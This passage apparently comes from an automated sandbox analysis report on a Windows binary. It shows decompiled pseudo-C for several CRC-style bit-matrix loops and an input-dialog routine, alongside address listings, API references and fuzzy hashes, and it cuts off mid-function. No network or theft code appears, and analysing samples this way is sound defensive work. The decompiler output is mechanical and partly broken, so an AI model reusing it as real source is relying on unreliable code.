						_t90 = _t90 + 4;
					} while (_t90 < 0x80);
					_t70 = _a4;
					do {
						_t91 = 0;
						do {
							_t55 =  *(_t96 + _t91 + 0x10);
							_t76 =  &_v256;
							_t84 = 0;
							if(_t55 != 0) {
								do {
									if((_t55 & 0x00000001) != 0) {
										_t84 = _t84 ^  *_t76;
									}
									_t76 =  &(_t76[1]);
									_t55 = _t55 >> 1;
								} while (_t55 != 0);
							}
							 *(_t96 + _t91 + 0x90) = _t84;
							_t91 = _t91 + 4;
						} while (_t91 < 0x80);
						if((_t94 & 0x00000001) != 0) {
							_t81 = 0;
							_t67 =  &_v128;
							if(_t70 != 0) {
								do {
									if((_t70 & 0x00000001) != 0) {
										_t81 = _t81 ^  *_t67;
									}
									_t67 =  &(_t67[1]);
									_t70 = _t70 >> 1;
								} while (_t70 != 0);
							}
							_t70 = _t81;
						}
						_t95 = (_t86 << 0x00000020 | _t94) >> 1;
						_t87 = _t86 >> 1;
						if((_t95 | _t87) != 0) {
							_t93 = 0;
							do {
								_t62 =  *(_t96 + _t93 + 0x90);
								_t77 =  &_v128;
								_t85 = 0;
								if(_t62 != 0) {
									do {
										if((_t62 & 0x00000001) != 0) {
											_t85 = _t85 ^  *_t77;
										}
										_t77 =  &(_t77[1]);
										_t62 = _t62 >> 1;
									} while (_t62 != 0);
								}
								 *(_t96 + _t93 + 0x10) = _t85;
								_t93 = _t93 + 4;
							} while (_t93 < 0x80);
							if((_t95 & 0x00000001) != 0) {
								_t80 = 0;
								_t66 =  &_v256;
								if(_t70 != 0) {
									do {
										if((_t70 & 0x00000001) != 0) {
											_t80 = _t80 ^  *_t66;
										}
										_t66 =  &(_t66[1]);
										_t70 = _t70 >> 1;
									} while (_t70 != 0);
								}
								_t70 = _t80;
							}
							goto L45;
						}
						break;
						L45:
						_t94 = (_t87 << 0x00000020 | _t95) >> 1;
						_t86 = _t87 >> 1;
					} while ((_t94 | _t86) != 0);
					return _t70 ^ _a8;
				} else {
					return _a4;
				}
			}


































                                        0x00410c90
                                        0x00410c97
                                        0x00410c9f
                                        0x00410ca6
                                        0x00410ca8
                                        0x00410cc0
                                        0x00410cc5
                                        0x00410ccd
                                        0x00410cd0
                                        0x00410cd0
                                        0x00410cd4
                                        0x00410cd5
                                        0x00410cd7
                                        0x00410cde
                                        0x00410ce0
                                        0x00410ce0
                                        0x00410ce4
                                        0x00410ce8
                                        0x00410cec
                                        0x00410cf0
                                        0x00410cf2
                                        0x00410cf4
                                        0x00410cf4
                                        0x00410cf6
                                        0x00410cf9
                                        0x00410cf9
                                        0x00410cf0
                                        0x00410cfd
                                        0x00410d04
                                        0x00410d07
                                        0x00410d0f
                                        0x00410d20
                                        0x00410d20
                                        0x00410d27
                                        0x00410d2e
                                        0x00410d32
                                        0x00410d34
                                        0x00410d36
                                        0x00410d38
                                        0x00410d38
                                        0x00410d3a
                                        0x00410d3d
                                        0x00410d3d
                                        0x00410d34
                                        0x00410d41
                                        0x00410d45
                                        0x00410d48
                                        0x00410d50
                                        0x00410d60
                                        0x00410d60
                                        0x00410d62
                                        0x00410d62
                                        0x00410d66
                                        0x00410d6a
                                        0x00410d6e
                                        0x00410d70
                                        0x00410d72
                                        0x00410d74
                                        0x00410d74
                                        0x00410d76
                                        0x00410d79
                                        0x00410d79
                                        0x00410d70
                                        0x00410d7d
                                        0x00410d84
                                        0x00410d87
                                        0x00410d97
                                        0x00410d99
                                        0x00410d9b
                                        0x00410da4
                                        0x00410da6
                                        0x00410da9
                                        0x00410dab
                                        0x00410dab
                                        0x00410dad
                                        0x00410db0
                                        0x00410db0
                                        0x00410da6
                                        0x00410db4
                                        0x00410db4
                                        0x00410db6
                                        0x00410dba
                                        0x00410dc0
                                        0x00410dc2
                                        0x00410dd0
                                        0x00410dd0
                                        0x00410dd7
                                        0x00410dde
                                        0x00410de2
                                        0x00410de4
                                        0x00410de6
                                        0x00410de8
                                        0x00410de8
                                        0x00410dea
                                        0x00410ded
                                        0x00410ded
                                        0x00410de4
                                        0x00410df1
                                        0x00410df5
                                        0x00410df8
                                        0x00410e08
                                        0x00410e0a
                                        0x00410e0c
                                        0x00410e12
                                        0x00410e14
                                        0x00410e17
                                        0x00410e19
                                        0x00410e19
                                        0x00410e1b
                                        0x00410e1e
                                        0x00410e1e
                                        0x00410e14
                                        0x00410e22
                                        0x00410e22
                                        0x00000000
                                        0x00410e08
                                        0x00000000
                                        0x00410e24
                                        0x00410e24
                                        0x00410e28
                                        0x00410e2c
                                        0x00410e47
                                        0x00410cb0
                                        0x00410cbf
                                        0x00410cbf

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                                        • Instruction ID: 9011a7d474417f1ffdc543b0d63bcc701059b11d7f749da49918c97b46a68ef0
                                        • Opcode Fuzzy Hash: 2ab1992bfbf39856a5a7dba111a3cc4862fa1f22f04eab95b8f25578d2bf0e3f
                                        • Instruction Fuzzy Hash: 8E41D532604B054BE728DE6DE8503EB7390EB84308F49493FD99697381D6FDF9C68689
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410D13, Relevance: .1, Instructions: 100COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00410D13(signed int __edi, void* __esi, signed int __ebp, char _a16, char _a144, signed int _a276, signed int _a280) {
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t46;
				signed int* _t50;
				signed int* _t51;
				signed int _t52;
				signed int* _t55;
				signed int* _t56;
				signed int* _t57;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				void* _t68;
				void* _t69;
				void* _t71;
				signed int _t72;
				signed int _t73;
				void* _t75;

				_t72 = __ebp;
				_t68 = __esi;
				_t65 = __edi;
				do {
					_t38 =  *(_t75 + _t68 + 0x90);
					_t55 =  &_a144;
					_t62 = 0;
					if(_t38 != 0) {
						do {
							if((_t38 & 0x00000001) != 0) {
								_t62 = _t62 ^  *_t55;
							}
							_t55 =  &(_t55[1]);
							_t38 = _t38 >> 1;
						} while (_t38 != 0);
					}
					 *(_t75 + _t68 + 0x10) = _t62;
					_t68 = _t68 + 4;
				} while (_t68 < 0x80);
				_t52 = _a276;
				do {
					_t69 = 0;
					do {
						_t39 =  *(_t75 + _t69 + 0x10);
						_t56 =  &_a16;
						_t63 = 0;
						if(_t39 != 0) {
							do {
								if((_t39 & 0x00000001) != 0) {
									_t63 = _t63 ^  *_t56;
								}
								_t56 =  &(_t56[1]);
								_t39 = _t39 >> 1;
							} while (_t39 != 0);
						}
						 *(_t75 + _t69 + 0x90) = _t63;
						_t69 = _t69 + 4;
					} while (_t69 < 0x80);
					if((_t72 & 0x00000001) != 0) {
						_t61 = 0;
						_t51 =  &_a144;
						if(_t52 != 0) {
							do {
								if((_t52 & 0x00000001) != 0) {
									_t61 = _t61 ^  *_t51;
								}
								_t51 =  &(_t51[1]);
								_t52 = _t52 >> 1;
							} while (_t52 != 0);
						}
						_t52 = _t61;
					}
					_t73 = (_t65 << 0x00000020 | _t72) >> 1;
					_t66 = _t65 >> 1;
					if((_t73 | _t66) != 0) {
						_t71 = 0;
						do {
							_t46 =  *(_t75 + _t71 + 0x90);
							_t57 =  &_a144;
							_t64 = 0;
							if(_t46 != 0) {
								do {
									if((_t46 & 0x00000001) != 0) {
										_t64 = _t64 ^  *_t57;
									}
									_t57 =  &(_t57[1]);
									_t46 = _t46 >> 1;
								} while (_t46 != 0);
							}
							 *(_t75 + _t71 + 0x10) = _t64;
							_t71 = _t71 + 4;
						} while (_t71 < 0x80);
						if((_t73 & 0x00000001) != 0) {
							_t60 = 0;
							_t50 =  &_a16;
							if(_t52 != 0) {
								do {
									if((_t52 & 0x00000001) != 0) {
										_t60 = _t60 ^  *_t50;
									}
									_t50 =  &(_t50[1]);
									_t52 = _t52 >> 1;
								} while (_t52 != 0);
							}
							_t52 = _t60;
						}
						goto L32;
					}
					break;
					L32:
					_t72 = (_t66 << 0x00000020 | _t73) >> 1;
					_t65 = _t66 >> 1;
				} while ((_t72 | _t65) != 0);
				return _t52 ^ _a280;
			}

























                                        0x00410d13
                                        0x00410d13
                                        0x00410d13
                                        0x00410d20
                                        0x00410d20
                                        0x00410d27
                                        0x00410d2e
                                        0x00410d32
                                        0x00410d34
                                        0x00410d36
                                        0x00410d38
                                        0x00410d38
                                        0x00410d3a
                                        0x00410d3d
                                        0x00410d3d
                                        0x00410d34
                                        0x00410d41
                                        0x00410d45
                                        0x00410d48
                                        0x00410d50
                                        0x00410d60
                                        0x00410d60
                                        0x00410d62
                                        0x00410d62
                                        0x00410d66
                                        0x00410d6a
                                        0x00410d6e
                                        0x00410d70
                                        0x00410d72
                                        0x00410d74
                                        0x00410d74
                                        0x00410d76
                                        0x00410d79
                                        0x00410d79
                                        0x00410d70
                                        0x00410d7d
                                        0x00410d84
                                        0x00410d87
                                        0x00410d97
                                        0x00410d99
                                        0x00410d9b
                                        0x00410da4
                                        0x00410da6
                                        0x00410da9
                                        0x00410dab
                                        0x00410dab
                                        0x00410dad
                                        0x00410db0
                                        0x00410db0
                                        0x00410da6
                                        0x00410db4
                                        0x00410db4
                                        0x00410db6
                                        0x00410dba
                                        0x00410dc0
                                        0x00410dc2
                                        0x00410dd0
                                        0x00410dd0
                                        0x00410dd7
                                        0x00410dde
                                        0x00410de2
                                        0x00410de4
                                        0x00410de6
                                        0x00410de8
                                        0x00410de8
                                        0x00410dea
                                        0x00410ded
                                        0x00410ded
                                        0x00410de4
                                        0x00410df1
                                        0x00410df5
                                        0x00410df8
                                        0x00410e08
                                        0x00410e0a
                                        0x00410e0c
                                        0x00410e12
                                        0x00410e14
                                        0x00410e17
                                        0x00410e19
                                        0x00410e19
                                        0x00410e1b
                                        0x00410e1e
                                        0x00410e1e
                                        0x00410e14
                                        0x00410e22
                                        0x00410e22
                                        0x00000000
                                        0x00410e08
                                        0x00000000
                                        0x00410e24
                                        0x00410e24
                                        0x00410e28
                                        0x00410e2c
                                        0x00410e47

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                                        • Instruction ID: 3dd5c152440cab78d5aae667ae240782b2045ed7eec750b186743ee13c3c1c98
                                        • Opcode Fuzzy Hash: 6219c0534570dcc087454eb9247404a7b3db1bae580b6f203b5ef7fccfb18fab
                                        • Instruction Fuzzy Hash: D1319432604B054BE728CDA9E8943EB7390EB84308F49493FC84697381CAF9F9C6C685
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410D59, Relevance: .1, Instructions: 82COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00410D59(signed int __ebx, signed int __edi, signed int __ebp, char _a16, char _a144, signed int _a280) {
				unsigned int _t30;
				unsigned int _t37;
				signed int* _t41;
				signed int* _t42;
				signed int _t43;
				signed int* _t46;
				signed int* _t47;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int _t55;
				void* _t57;
				void* _t59;
				signed int _t60;
				signed int _t61;
				void* _t63;

				_t60 = __ebp;
				_t54 = __edi;
				_t43 = __ebx;
				do {
					_t57 = 0;
					do {
						_t30 =  *(_t63 + _t57 + 0x10);
						_t46 =  &_a16;
						_t52 = 0;
						if(_t30 != 0) {
							do {
								if((_t30 & 0x00000001) != 0) {
									_t52 = _t52 ^  *_t46;
								}
								_t46 =  &(_t46[1]);
								_t30 = _t30 >> 1;
							} while (_t30 != 0);
						}
						 *(_t63 + _t57 + 0x90) = _t52;
						_t57 = _t57 + 4;
					} while (_t57 < 0x80);
					if((_t60 & 0x00000001) != 0) {
						_t51 = 0;
						_t42 =  &_a144;
						if(_t43 != 0) {
							do {
								if((_t43 & 0x00000001) != 0) {
									_t51 = _t51 ^  *_t42;
								}
								_t42 =  &(_t42[1]);
								_t43 = _t43 >> 1;
							} while (_t43 != 0);
						}
						_t43 = _t51;
					}
					_t61 = (_t54 << 0x00000020 | _t60) >> 1;
					_t55 = _t54 >> 1;
					if((_t61 | _t55) != 0) {
						_t59 = 0;
						do {
							_t37 =  *(_t63 + _t59 + 0x90);
							_t47 =  &_a144;
							_t53 = 0;
							if(_t37 != 0) {
								do {
									if((_t37 & 0x00000001) != 0) {
										_t53 = _t53 ^  *_t47;
									}
									_t47 =  &(_t47[1]);
									_t37 = _t37 >> 1;
								} while (_t37 != 0);
							}
							 *(_t63 + _t59 + 0x10) = _t53;
							_t59 = _t59 + 4;
						} while (_t59 < 0x80);
						if((_t61 & 0x00000001) != 0) {
							_t50 = 0;
							_t41 =  &_a16;
							if(_t43 != 0) {
								do {
									if((_t43 & 0x00000001) != 0) {
										_t50 = _t50 ^  *_t41;
									}
									_t41 =  &(_t41[1]);
									_t43 = _t43 >> 1;
								} while (_t43 != 0);
							}
							_t43 = _t50;
						}
						goto L26;
					}
					break;
					L26:
					_t60 = (_t55 << 0x00000020 | _t61) >> 1;
					_t54 = _t55 >> 1;
				} while ((_t60 | _t54) != 0);
				return _t43 ^ _a280;
			}





















                                        0x00410d59
                                        0x00410d59
                                        0x00410d59
                                        0x00410d60
                                        0x00410d60
                                        0x00410d62
                                        0x00410d62
                                        0x00410d66
                                        0x00410d6a
                                        0x00410d6e
                                        0x00410d70
                                        0x00410d72
                                        0x00410d74
                                        0x00410d74
                                        0x00410d76
                                        0x00410d79
                                        0x00410d79
                                        0x00410d70
                                        0x00410d7d
                                        0x00410d84
                                        0x00410d87
                                        0x00410d97
                                        0x00410d99
                                        0x00410d9b
                                        0x00410da4
                                        0x00410da6
                                        0x00410da9
                                        0x00410dab
                                        0x00410dab
                                        0x00410dad
                                        0x00410db0
                                        0x00410db0
                                        0x00410da6
                                        0x00410db4
                                        0x00410db4
                                        0x00410db6
                                        0x00410dba
                                        0x00410dc0
                                        0x00410dc2
                                        0x00410dd0
                                        0x00410dd0
                                        0x00410dd7
                                        0x00410dde
                                        0x00410de2
                                        0x00410de4
                                        0x00410de6
                                        0x00410de8
                                        0x00410de8
                                        0x00410dea
                                        0x00410ded
                                        0x00410ded
                                        0x00410de4
                                        0x00410df1
                                        0x00410df5
                                        0x00410df8
                                        0x00410e08
                                        0x00410e0a
                                        0x00410e0c
                                        0x00410e12
                                        0x00410e14
                                        0x00410e17
                                        0x00410e19
                                        0x00410e19
                                        0x00410e1b
                                        0x00410e1e
                                        0x00410e1e
                                        0x00410e14
                                        0x00410e22
                                        0x00410e22
                                        0x00000000
                                        0x00410e08
                                        0x00000000
                                        0x00410e24
                                        0x00410e24
                                        0x00410e28
                                        0x00410e2c
                                        0x00410e47

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                                        • Instruction ID: 5e4d5c88b846c219635e211c6630d2eada18fe7a04d3b47badeadb9c6176df37
                                        • Opcode Fuzzy Hash: 8f177ef76dc2d83bc780de5ca5247833b6fb957e59de742fcb7e95280a36d76d
                                        • Instruction Fuzzy Hash: B1218632644B054BE7788DA9E8953EB7390EB84304F49493FC956973C1CAE9FDC6C285
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00408F09, Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E00408F09(void* __ecx, void* __edx, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				struct _WNDCLASSEXW _v48;
				struct tagMSG _v88;
				short _v90;
				WCHAR* _v92;
				char _v94;
				struct tagACCEL _v100;
				wchar_t* _v108;
				wchar_t* _v116;
				struct HINSTANCE__* _t48;
				WCHAR* _t51;
				struct HWND__* _t56;
				struct HWND__* _t57;
				int _t58;
				int _t62;
				struct HWND__* _t74;
				struct HWND__* _t76;
				struct HWND__* _t80;
				short _t82;
				WCHAR* _t84;
				int _t105;
				WCHAR* _t110;
				struct HWND__* _t111;
				void* _t112;
				void* _t116;
				wchar_t* _t117;
				struct HACCEL__* _t122;
				int _t130;

				_t116 = __edx;
				_t112 = __ecx;
				_v100.cmd = 0;
				_t110 = E00408DF8(_a4);
				_v92 = _t110;
				_a4 = E00408DF8(_a8);
				_t117 = E00408DF8(_a12);
				_t130 =  *0x418124; // 0x0
				if(_t130 == 0) {
					 *0x418124 = GetStockObject(0x11);
				}
				_t48 =  *0x41806c; // 0x400000
				_v48.cbSize = 0x30;
				_v48.style = 3;
				_v48.lpfnWndProc = E00408E54;
				_v48.cbClsExtra = 0;
				_v48.cbWndExtra = 0;
				_v48.hInstance = _t48;
				_v48.hIcon = LoadIconW(_t48, 1);
				_v48.hCursor = LoadCursorW(0, 0x7f00);
				_t51 =  *0x417108; // 0x413044
				_v48.lpszClassName = _t51;
				_v48.hbrBackground = 0x10;
				_v48.lpszMenuName = 0;
				_v48.hIconSm = 0;
				RegisterClassExW( &_v48);
				 *0x418128 = 0;
				 *0x418138 = E00409471(_t112);
				E00409528(1);
				_t56 =  *0x418138; // 0x0
				if(_t56 == 0 || IsWindowEnabled(_t56) == 0) {
					 *0x41813c = 0;
				} else {
					EnableWindow( *0x418138, 0);
					 *0x41813c = 1;
				}
				_t57 = E00409471(_t112);
				_t58 = GetSystemMetrics(1);
				asm("cdq");
				_t62 = GetSystemMetrics(0);
				asm("cdq");
				_t111 = CreateWindowExW(0,  *0x417108, _t110, 0x10c80000, (_t62 - _t116 >> 1) - 0x96, (_t58 - _t116 >> 1) - 0x41, 0x12c, 0x82, _t57, 0,  *0x41806c, 0);
				if(_t111 == 0) {
					L20:
					if(_v100.cmd != 0) {
						goto L22;
					}
					goto L21;
				} else {
					 *0x417618(_t111, 0xffffffeb,  &(_v100.cmd));
					_t74 = CreateWindowExW(0, L"STATIC", _v48.lpszClassName, 0x5000000b, 0xa, 0xa, 0x118, 0x16, _t111, 0,  *0x41806c, 0);
					 *0x418134 = _t74;
					SendMessageW(_t74, 0x30,  *0x418124, 1);
					if((_a4 & 0x00000001) != 0) {
						_push(0x20);
						_pop(0);
					}
					_t76 = CreateWindowExW(0x200, L"EDIT", 0, 0x50010080, 0xa, 0x20, 0x113, 0x15, _t111, 0xa,  *0x41806c, 0);
					 *0x418130 = _t76;
					SendMessageW(_t76, 0x30,  *0x418124, 1);
					SetFocus( *0x418130);
					if(_t117 != 0) {
						SendMessageW( *0x418130, 0xc, 0, _t117);
						_push(wcslen(_t117));
						_t105 = wcslen(_t117);
						_pop(_t112);
						SendMessageW( *0x418130, 0xb1, _t105, ??);
					}
					_t80 = CreateWindowExW(0, L"BUTTON", L"OK", 0x50010001, 0x6e, 0x43, 0x50, 0x19, _t111, 0x3e8,  *0x41806c, 0);
					 *0x41812c = _t80;
					SendMessageW(_t80, 0x30,  *0x418124, 1);
					_t82 = 0xd;
					_v100.key = _t82;
					_v100.cmd = 0x3e8;
					_t84 = 0x1b;
					_v92 = _t84;
					_v90 = 0x3e9;
					_v100.fVirt = 1;
					_v94 = 1;
					_t122 = CreateAcceleratorTableW( &_v100, 2);
					SetForegroundWindow(_t111);
					BringWindowToTop(_t111);
					while( *0x418128 == 0) {
						if(GetMessageW( &_v88, 0, 0, 0) == 0) {
							break;
						}
						if(TranslateAcceleratorW(_t111, _t122,  &_v88) == 0) {
							TranslateMessage( &_v88);
							DispatchMessageW( &_v88);
						}
					}
					if(_t122 != 0) {
						DestroyAcceleratorTable(_t122);
					}
					if(_v108 == 0) {
						L21:
						E0040E940(_t112, _a20);
						L22:
						E00408E3A(_v92);
						E00408E3A(_a4);
						return E00408E3A(_t117);
					} else {
						wcscpy(E0040E8A0(wcslen(_v108), _a8), _v116);
						_pop(_t112);
						HeapFree( *0x418068, 0, _v116);
						goto L20;
					}
				}
			}






























                                        0x00408f09
                                        0x00408f09
                                        0x00408f16
                                        0x00408f25
                                        0x00408f27
                                        0x00408f37
                                        0x00408f46
                                        0x00408f48
                                        0x00408f4e
                                        0x00408f58
                                        0x00408f58
                                        0x00408f5d
                                        0x00408f65
                                        0x00408f6d
                                        0x00408f75
                                        0x00408f7d
                                        0x00408f81
                                        0x00408f85
                                        0x00408f95
                                        0x00408f9f
                                        0x00408fa3
                                        0x00408fa8
                                        0x00408fb1
                                        0x00408fb9
                                        0x00408fbd
                                        0x00408fc1
                                        0x00408fc7
                                        0x00408fd4
                                        0x00408fd9
                                        0x00408fde
                                        0x00408fe5
                                        0x0040900b
                                        0x00408ff2
                                        0x00408ff9
                                        0x00408fff
                                        0x00408fff
                                        0x00409019
                                        0x00409031
                                        0x00409033
                                        0x0040903e
                                        0x00409046
                                        0x00409061
                                        0x00409065
                                        0x0040925a
                                        0x0040925f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040906b
                                        0x00409073
                                        0x004090a1
                                        0x004090b1
                                        0x004090b9
                                        0x004090c3
                                        0x004090c5
                                        0x004090c7
                                        0x004090c7
                                        0x004090f7
                                        0x00409101
                                        0x00409109
                                        0x00409111
                                        0x00409119
                                        0x00409126
                                        0x0040912f
                                        0x00409131
                                        0x00409136
                                        0x00409143
                                        0x00409143
                                        0x0040916d
                                        0x00409177
                                        0x0040917f
                                        0x00409183
                                        0x00409184
                                        0x00409190
                                        0x00409195
                                        0x00409196
                                        0x004091a0
                                        0x004091ac
                                        0x004091b1
                                        0x004091bd
                                        0x004091bf
                                        0x004091c6
                                        0x0040920a
                                        0x004091e1
                                        0x00000000
                                        0x00000000
                                        0x004091f2
                                        0x004091f9
                                        0x00409204
                                        0x00409204
                                        0x004091f2
                                        0x00409215
                                        0x00409218
                                        0x00409218
                                        0x00409223
                                        0x00409261
                                        0x00409268
                                        0x0040926d
                                        0x00409271
                                        0x0040927a
                                        0x0040928f
                                        0x00409225
                                        0x00409241
                                        0x00409247
                                        0x00409254
                                        0x00000000
                                        0x00409254
                                        0x00409223

                                        APIs
                                          • Part of subcall function 00408DF8: wcslen.MSVCRT ref: 00408E04
                                          • Part of subcall function 00408DF8: RtlAllocateHeap.KERNEL32(00000000,00000000,?,00408F21,?), ref: 00408E1A
                                          • Part of subcall function 00408DF8: wcscpy.MSVCRT ref: 00408E2B
                                        • GetStockObject.GDI32(00000011), ref: 00408F52
                                        • LoadIconW.USER32 ref: 00408F89
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00408F99
                                        • RegisterClassExW.USER32 ref: 00408FC1
                                        • IsWindowEnabled.USER32(00000000), ref: 00408FE8
                                        • EnableWindow.USER32(00000000), ref: 00408FF9
                                        • GetSystemMetrics.USER32 ref: 00409031
                                        • GetSystemMetrics.USER32 ref: 0040903E
                                        • CreateWindowExW.USER32 ref: 0040905F
                                        • 7313B5A0.USER32(00000000,000000EB,?,?,?,?,?,?), ref: 00409073
                                        • CreateWindowExW.USER32 ref: 004090A1
                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 004090B9
                                        • CreateWindowExW.USER32 ref: 004090F7
                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409109
                                        • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409111
                                        • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409126
                                        • wcslen.MSVCRT ref: 00409129
                                        • wcslen.MSVCRT ref: 00409131
                                        • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00409143
                                        • CreateWindowExW.USER32 ref: 0040916D
                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 0040917F
                                        • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004091B6
                                        • SetForegroundWindow.USER32(00000000), ref: 004091BF
                                        • BringWindowToTop.USER32 ref: 004091C6
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004091D9
                                        • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 004091EA
                                        • TranslateMessage.USER32(?), ref: 004091F9
                                        • DispatchMessageW.USER32 ref: 00409204
                                        • DestroyAcceleratorTable.USER32 ref: 00409218
                                        • wcslen.MSVCRT ref: 00409229
                                        • wcscpy.MSVCRT ref: 00409241
                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409254
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: MessageWindow$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$7313AllocateBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconObjectRegisterStock
                                        • String ID: 0$BUTTON$D0A$EDIT$STATIC
                                        • API String ID: 2315750534-2968808370
                                        • Opcode ID: 4fd5c5c81e2e9a1028e5af9219d10588e958863bc4364d561c47bf030e7b1763
                                        • Instruction ID: 0d702fe3c8b68611953c6972b71a7bc07691bfe1604eefc7ee2931097a23979a
                                        • Opcode Fuzzy Hash: 4fd5c5c81e2e9a1028e5af9219d10588e958863bc4364d561c47bf030e7b1763
                                        • Instruction Fuzzy Hash: 2791A071548300BFE7219F65DC49F9B7FA9EB48B54F00893EF684A61E1CBB588408B5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401511, Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E00401511(void* __edi, void* __esi, char _a4, long _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v0;
				char _v4;
				char _v8;
				struct _OVERLAPPED* _v12;
				char _v16;
				char _v20;
				intOrPtr _v28;
				char _v36;
				signed int _v48;
				void* __ebx;
				void* _t65;
				void* _t66;
				void* _t82;
				void* _t88;
				void* _t94;
				void* _t99;
				void* _t100;
				void* _t108;
				void* _t111;
				void* _t120;
				long _t129;
				void* _t130;
				void* _t131;
				void* _t136;
				signed int _t142;
				void* _t151;
				void* _t152;
				void* _t157;
				void* _t159;
				void* _t163;
				intOrPtr _t178;
				intOrPtr _t183;
				void* _t186;
				signed int _t189;
				void* _t190;
				void* _t191;
				void* _t193;
				void* _t196;
				void* _t199;
				intOrPtr _t200;
				void* _t201;
				intOrPtr _t202;
				intOrPtr _t203;
				intOrPtr _t205;
				void* _t206;
				intOrPtr _t207;
				void* _t208;
				intOrPtr _t210;
				void* _t211;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t218;
				void* _t221;
				void* _t223;
				void* _t224;
				intOrPtr _t227;
				void* _t231;

				_t224 = __esi;
				_t223 = __edi;
				_t189 = 0xb;
				do {
					_t231 = _t231 - 4;
					_v12 = 0;
					_t189 = _t189 - 1;
				} while (_t189 != 0);
				E0040E600();
				_t169 =  *0x4180ec; // 0x1
				if(_t169 != 1) {
					 *0x4180ec = 1;
					_a16 = 1;
					while(1) {
						_t65 = E0040E4C0();
						_t190 = _t189;
						_push(_t65);
						_t66 = E0040E4C0();
						_t191 = _t190;
						E004057F0(_t169, _t223, _t224,  *0x41807c, _a16, 0x41702a, _t66);
						_push( &_v12);
						E0040E500();
						_v12 = E00405920(_v20, 0x41702e);
						__eflags = _v12;
						if(_v12 != 0) {
							_t130 = E0040E4C0();
							_t213 = _t191;
							_push(_t130);
							_t131 = E0040E4C0();
							_t214 = _t213;
